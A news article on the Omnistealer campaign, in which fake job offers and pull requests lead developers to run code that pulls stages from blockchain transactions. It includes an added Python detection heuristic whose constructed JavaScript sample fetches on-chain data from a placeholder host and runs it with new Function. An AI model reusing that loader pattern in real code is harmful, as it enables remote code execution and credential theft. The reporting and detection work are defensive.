Cutting corners: The code looked harmless. A GitHub repository, a small freelance task, and a standard request sent over LinkedIn to a blockchain engineer: run this snippet, fix a few bugs, get paid. It was the sort of job offer that crosses developers' inboxes every day. It was also the entry point for a global credential-stealing operation that security researchers now say rivals major attacks like WannaCry in its potential impact.

The malware at the center of it, dubbed Omnistealer by investigators, uses public blockchains not just for payments, but as part of the delivery system itself. Once running, it digs through a victim's machine and pulls out almost everything of value.

Omnistealer's design is simple to trigger but complex under the hood. The initial code reaches out to the TRON or Aptos blockchains, which are attractive because on-chain operations are cheap. From there, it reads data hidden in those transactions and uses that information as a pointer to the Binance Smart Chain.

That chain in turn delivers more code, which then "fetches the final form – malicious code," said Nick Smart, chief intelligence officer at Crystal Intelligence. When that final payload executes, it activates the info-stealer. "It literally steals everything," Ellis Stannard, a core member of Ransom-ISAC, told PCMag. The group is a small, recently formed network of international cybersecurity professionals.
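The delivery chain above (cheap public chain read, pointer to Binance Smart Chain, fetched code executed) is the pattern a reviewer should look for before running a "test project". The heuristic below is an added example written for this article, not code from the campaign or from the researchers; the JavaScript samples it scans are constructed, the `tron.example` host is a placeholder, and the regexes are assumptions about how such a loader might read.

```python
"""Pre-execution review heuristic for a freelance 'test project' (added example)."""
import re

# Indicators tied to the described delivery chain: references to the cheap public
# chains (TRON / Aptos) and to Binance Smart Chain, network fetches, hex/base64
# decoding, and dynamic execution of whatever was fetched.
CHAIN_HINTS = re.compile(r"\b(tron|aptos|bsc|binance|bnb)\b", re.IGNORECASE)
FETCH_HINTS = re.compile(r"\b(fetch|axios|https?\.get|request)\b")
DYNEXEC_HINTS = re.compile(r"\b(eval|new Function|vm\.runInNewContext|child_process|exec)\b")
DECODE_HINTS = re.compile(r"(Buffer\.from\([^)]*[\"']hex[\"']|atob\(|base64)")


def score_source(text: str) -> dict:
    """Return the indicators found in one source file and a review verdict."""
    findings = {
        "chain": sorted({m.lower() for m in CHAIN_HINTS.findall(text)}),
        "fetch": sorted(set(FETCH_HINTS.findall(text))),
        "dyn_exec": sorted(set(DYNEXEC_HINTS.findall(text))),
        "decode": bool(DECODE_HINTS.search(text)),
    }
    # A chain reference alone is normal in a blockchain repo; the combination that
    # matters is chain data being fetched and then executed as code.
    chain_to_exec = bool(findings["chain"] and findings["fetch"] and findings["dyn_exec"])
    findings["verdict"] = "review before running" if chain_to_exec else "no chain-to-exec pattern"
    return findings


# Constructed sample of a loader-style snippet (not the campaign's code).
SAMPLE_SUSPICIOUS = r'''
const res = await fetch("https://tron.example/v1/contracts/" + addr + "/transactions");
const hex = (await res.json()).data[0].raw_data_hex;
const ptr = Buffer.from(hex, "hex").toString();   // on-chain data used as a pointer
const bsc = await fetch(ptr);                      // second hop to the next chain
new Function(await bsc.text())();                  // run whatever came back
'''

# Constructed sample of ordinary wallet code that merely talks to a chain.
SAMPLE_BENIGN = r'''
// read a balance on Binance Smart Chain
const { ethers } = require("ethers");
const provider = new ethers.JsonRpcProvider(process.env.RPC_URL);
console.log((await provider.getBalance(addr)).toString());
'''

if __name__ == "__main__":
    for name, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, score_source(src))
```

The check is deliberately coarse: it is meant to stop a developer from executing unreviewed code, not to classify malware.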

The "everything" in this case is broad. Ransom-ISAC's team found the malware targets more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase. It can target more than 10 password managers, including LastPass, more than 10 browsers such as Chrome and Firefox, and cloud services like Google Drive.

One infection can expose crypto holdings, corporate passwords, and sensitive documents at once. Investigators have tied around 300,000 stolen credentials to this operation so far, including data from cybersecurity firms, defense companies, and government agencies in countries such as the US and Bangladesh. They say that number is likely only a small part of the true total.

To reach those high-value environments, the attackers start lower in the stack: with developers and contractors. As of January, researchers saw two recurring roles in the scam. In one, the attackers pose as recruiters or intermediaries for well-known companies that outsource software engineering. In the other, they present themselves as freelance developers looking for work. Both roles lead back to the same technical move: they convince someone to run their GitHub code.

When the impostors act as recruiters, they "hire" freelance developers – often in South Asia – and send them test projects. The repository looks normal, the instructions are familiar, and there may even be pay for the work. Buried inside is the code that starts the blockchain-based chain reaction and ultimately deploys Omnistealer.

In the freelancer scenario, the malicious developer secures a contract and then submits tainted pull requests. "They push out garbage pull requests in GitHub that contain hidden malware," Stannard said. "Since this case, I haven't been able to look at GitHub the same way."

The focus on South Asian developers appears intentional. India was the largest source of new GitHub developers in 2025 and ranked first on Chainalysis's crypto adoption index that year, making it a prime hunting ground for technically skilled and crypto-savvy workers. Lower average incomes also make unsolicited job offers harder to ignore.

Following the money and the infrastructure led to familiar territory in state-sponsored hacking.

Investigators traced some activity to IP addresses in Vladivostok, Russia, including one linked to a former US consulate building that other teams have previously associated with North Korean operations.

Some of the crypto wallets used in this campaign match those seen in Lazarus Group's $1.5 billion theft from Dubai-based exchange Bybit in February 2025, as well as earlier attacks like WannaCry and the Sony Pictures hack.

At the same time, the social-engineering style looks more like the cluster known as Contagious Interview than classic Lazarus tradecraft, according to Nick Carlsen, a senior North Korea specialist at blockchain intelligence firm TRM Labs. He described Contagious as a "smaller subset group," noting that different branches of the North Korean state run their own hacking units, much as the CIA, FBI, and NSA do in the US.

For North Korea, Carlsen said, the primary goal in many cyber operations is still financial. Stolen cryptocurrency can fund nuclear and military programs. But the volume of credentials collected in this case opens other pathways.

He suggested the attackers could use those identities to build convincing fake profiles for North Korean IT workers, who could then open accounts not visibly tied to the country and help launder funds. They might also simply sell access to the accounts and passwords on underground markets. "Everything about this has DPRK (North Korea) written all over it," Stannard said. These, he added, are not hobbyists but "organized actors using malware that can extract both corporate access credentials and cryptocurrency, both extremely valuable resources for a widely sanctioned nation."

The technology choices behind the campaign make it difficult to fully shut down. Omnistealer's components are stored inside blockchain transactions, turning public ledgers into permanent hosting for attack data. As more blocks are added, those malicious records sink deeper, and tracking them requires long and expensive investigative work.

Ransom-ISAC has described "hiding malicious payloads within blockchain" as an emerging obfuscation technique. With AI-assisted coding tools now commonplace, copying the approach will be easier for less-skilled threat actors.

The researchers have shared their findings with the FBI's Internet Crime Complaint Center. The bureau said it is "aware of the DPRK utilizing social engineering tactics to target developers in the blockchain development space, and this technique highlights the continuing evolution of the DPRK's ability to exploit the web3 space." Officials declined to provide more detail, citing ongoing investigations.